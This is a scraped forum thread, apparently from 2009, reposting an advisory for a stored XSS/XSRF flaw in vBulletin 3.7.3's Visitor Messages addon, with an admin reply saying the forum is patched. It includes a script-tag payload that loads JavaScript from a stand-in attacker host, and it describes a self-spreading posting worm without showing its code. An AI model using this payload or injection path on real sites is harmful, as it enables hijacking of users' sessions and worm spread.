Go Back   Gaming Gutter > Non-Gaming > Programming > Source Code


Source Code - Have a source code/project files you want to post? Do so here.

» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» GG Stuff

Follow us on Twitter!

Get the GG toolbar today (for firefox only)
» Recent Threads
Go to first new post help
03-17-2010 05:31 PM
Last post by zhao heanato yun
Today 11:37 AM
3 Replies, 11 Views
Go to first new post What are you currently...
09-12-2008 03:16 PM
by Ocean
Last post by Ruzzeh
Today 11:33 AM
2,966 Replies, 23,996 Views
Go to first new post Post Your Picture (Read...
10-09-2006 11:34 PM
by Ryan
Last post by Ruzzeh
Today 11:28 AM
14,322 Replies, 248,150 Views
Go to first new post MotM February Voting!
Today 09:05 AM
by Zombie
Last post by MeinKampfyChair
Today 11:20 AM
3 Replies, 36 Views
Go to first new post ~ The Official Hash...
11-06-2009 10:56 AM
by mehike
Last post by shadyangelz
Today 10:50 AM
920 Replies, 21,246 Views
Reply
 
LinkBack Thread Tools Display Modes

 vBulletin 3.7.3 Visitor Messages XSS/XSRF
Old 01-13-2009, 11:08 AM   #1 (permalink)
Banned

Female Baka is offline
 
Join Date: Jun 2007
Posts: 406
GPoints: 2,774
iTrader: 8 / 100%
Baka Is Recognizable
Rep Power: 0
vBulletin 3.7.3 Visitor Messages XSS/XSRF

[COLOR=#cccccc]My friend Mike contacted me on MSN and told me how he exploited a site with all these flaws. To my amazement, I realised it was on milwOrm out of all places.

/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF

- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.

* Enjoy. Credits to Michael J who exploited it
  Reply With Quote

 
Old 01-13-2009, 01:27 PM   #2 (permalink)
R
Admin

Female R is offline

 
R's Avatar
 
Join Date: Dec 1969
Posts: 6,036
GPoints: 41,518
iTrader: 33 / 100%
R - Total CelebrityR - Total CelebrityR - Total CelebrityR - Total CelebrityR - Total CelebrityR - Total CelebrityR - Total Celebrity
Rep Power: 100
our version is updated
__________________
Quote:

(03:35:32 PM) [c=48]Fewmitz[/c]: If anyone can find a way to piss someone off, it's you.
  Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Powered by vBadvanced CMPS v3.1.0

All times are GMT -7. The time now is 11:46 AM.


vBulletin skin developed by: eXtremepixels
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.23260498 seconds (100.00% PHP - 0% MySQL) with 21 queries